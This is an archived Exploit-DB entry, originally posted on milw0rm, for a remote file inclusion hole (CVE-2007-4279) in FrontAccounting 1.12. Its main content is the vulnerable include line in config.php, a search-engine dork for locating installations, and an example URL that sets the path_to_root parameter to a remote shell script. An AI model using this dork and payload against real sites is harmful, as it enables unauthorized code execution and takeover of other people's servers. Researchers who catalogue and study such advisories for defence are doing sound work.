FrontAccounting 1.12 build 31 - Remote File Inclusion
Author: kezzap66345
type: webapps
platform: php
port:
date_added: 2007-08-06
date_updated: 2016-10-12
verified: 1
codes: OSVDB-36431;CVE-2007-4279
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comfrontaccount-1.12.tar.gz
?????__________________________________________?????
????????_____________________________________???????
???????????_________________________________????????
??????????????_____________________________?????????
????????????????__________________________??????????
???????????????????______________________???????????
?????????????????????___________________????????????
??????????????????????_________________?????????????
????????????????????????_______________?????????????
??????????????????????????_____________?????????????
___?????????????????????????__________??????????????
_____?????????????????????????________??????????????
________???????????????????????_______??????????????
___________??????????????????????_____??????????????
________________???????????????????___??????????????
_____________________???????????????__??????????????
___________________________????????????????????????_
_____________________???????????????????????????____
______________???????????????????????????????_______
___________???????????????????????????????????______
________????????????????????????????????????????____
______????????_____??????????????????????????????___
____?????????_______??????????????????????????????__
__???????????_______???????????????????????????????_
_?????????????_____?????????????????????????????????
????????????????????????????????????????????????????
????????????????????????????????????????????????????
????????????????????????????????????????????????????
????????????????????????????????????????????????????
_??????????????????????????????????????????????????_
__?????????????????????????????????????????????????_
_____?????????????????????????????????????????????__
_________????????????????????????????????????????___
_______________??????????????????????????????????___
_________________???????????????????????????????____
_________________???????????????????????????________
________________??????????_____??????????___________
_________________?????_________?????_________?????__
__________????_________????____________?????????____
__________?????????????????_____??????????__________
__________?????????????????___?????_________________
__________?????______??????_________________________
#FrontAccounting <= Remote File Inclusion Vulnerability
#
#Dork:"FrontAccounting
#
#Vuln Code
##############################################################################################
#
#ERROR1:config.php
#
# include_once($path_to_root . "/config_db.php");
# include_once($path_to_root . "/includes/lang/language.php"); <<< RFI
CODE
#
#
#
#
#BUG1:config.php?path_to_root
#
#Example1:http://site.com/path/config.php?path_to_root=[[Sh3LLScript]]
#
##############################################################################################
#
#http://sourceforge.net/projects/frontaccounting/
#
##############################################################################################
#
#coded by K3ZZAP66345
#
#
#####specialthanx:###..Str0ke..####..KEZZAP66345..####..Wocker..##############################
##############################################################################################
# milw0rm.com [2007-08-07]